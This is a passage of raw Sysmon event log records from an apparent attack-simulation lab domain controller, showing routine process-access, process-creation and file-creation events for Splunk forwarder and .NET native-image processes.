13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005698Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005697Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-910C-6005-7301-00000000A301}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.078{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-910C-6005-7301-00000000A301}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:48.079{59A5CD1D-910C-6005-7301-00000000A301}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-910E-6005-7501-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-910E-6005-7501-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.000{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-910E-6005-7501-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:50.001{59A5CD1D-910E-6005-7501-00000000A301}4380C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000005732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:51.594{59A5CD1D-9100-6005-6E01-00000000A301}4188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\105c-0\PresentationFramework.dll2021-01-18 13:45:51.594 10341000x80000000000000005742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:52.781{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9110-6005-7801-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:52.766{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9110-6005-7801-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:52.766{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9110-6005-7801-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:52.703{59A5CD1D-9110-6005-7701-00000000A301}4240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1090-0\PresentationFramework.Aero2.dll2021-01-18 13:45:52.703 10341000x80000000000000005738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 